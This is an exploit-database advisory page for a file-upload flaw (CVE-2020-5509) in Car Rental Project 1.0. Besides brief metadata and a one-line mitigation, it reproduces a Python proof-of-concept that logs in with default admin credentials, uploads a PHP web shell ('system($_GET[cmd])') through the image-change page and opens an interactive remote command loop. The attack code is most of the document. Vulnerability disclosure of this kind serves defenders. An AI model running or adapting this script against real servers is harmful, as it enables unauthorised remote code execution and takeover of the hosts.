Car Rental Project 1.0 - Remote Code Execution

vendor:

Car Rental Project

by:

FULLSHADE, SC

6.1

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Car Rental Project

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2020-5509

CPE: a:phpgurukul:car_rental_project:1.0

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=135519, https://www.infosecmatter.com/nessus-plugin-library/?id=130869, https://www.infosecmatter.com/nessus-plugin-library/?id=97252, https://www.infosecmatter.com/nessus-plugin-library/?id=153223, https://www.infosecmatter.com/nessus-plugin-library/?id=100441

Platforms Tested: Windows

2020

Car Rental Project 1.0 – Remote Code Execution

Car Rental Project version 1.0 allows an attacker to upload arbitrary files due to lack of validation on file types during the image change operation. This can be exploited to upload malicious files and execute arbitrary commands on the server.

Mitigation:

To mitigate this vulnerability, ensure that file uploads are properly validated and restricted to specific file types. Implement server-side validation and sanitize user inputs to prevent arbitrary file uploads.

Source

Exploit-DB raw data:

# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
# Date: 1/3/2020
# Exploit Author: FULLSHADE, SC
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509
# ==================================================
# Information & description
# ==================================================
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
# ==================================================
# Manual POC
# ==================================================
# Manual POC method
# - Visit carrental > admin login > changeimage1.php
# - Upload a php rce vulnerable payload
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
# - Execute commands on the server
# ==================================================
# POC automation script
# ==================================================

import sys
import requests

print("""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution
FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
""")

def login():
    sessionObj = requests.session()
    RHOSTS = sys.argv[1]
    bigstring = "\n+-------------------------------------------------------------+\n"
    print("+-------------------------------------------------------------+")
    print("[+] Victim host: {}".format(RHOSTs))
    POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
    SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"

    # login / authentication
    payload = {"username": "admin", "password": "Test@12345", "login": ""}
    login = sessionObj.post(POST_AUTH_LOGIN, data=payload)

    # get response
    if login.status_code == 200:
        print("[+] Login HTTP response code: 200")
        print("[+] Successfully logged in")
    else:
        print("[!] Failed to authenticate")
        sys.exit()

    # get session token
    session_cookie_dic = sessionObj.cookies.get_dict()
    token = session_cookie_dic["PHPSESSID"]
    print("[+] Session cookie: {}".format(token))

    # proxy for Burp testing
    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

    # data for uploading the backdoor request
    backdoor_file = {
        "img1": (
            "1dccadfed7bcbb036c56a4afb97e906f.php",
            '<?php system($_GET["cmd"]); ?>',
            "Content-Type application/x-php",
        )
    }
    backdoor_data = {"update": ""}
    SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"

    # actually upload the php shell
    try:
        r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
        print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
    except:
        print("[!] Failed to upload backdoor")

    # get command execution
    while True:
        COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
        SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
        # get R,CE results
        respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
        print(respond.text)

if __name__ == "__main__":
    login()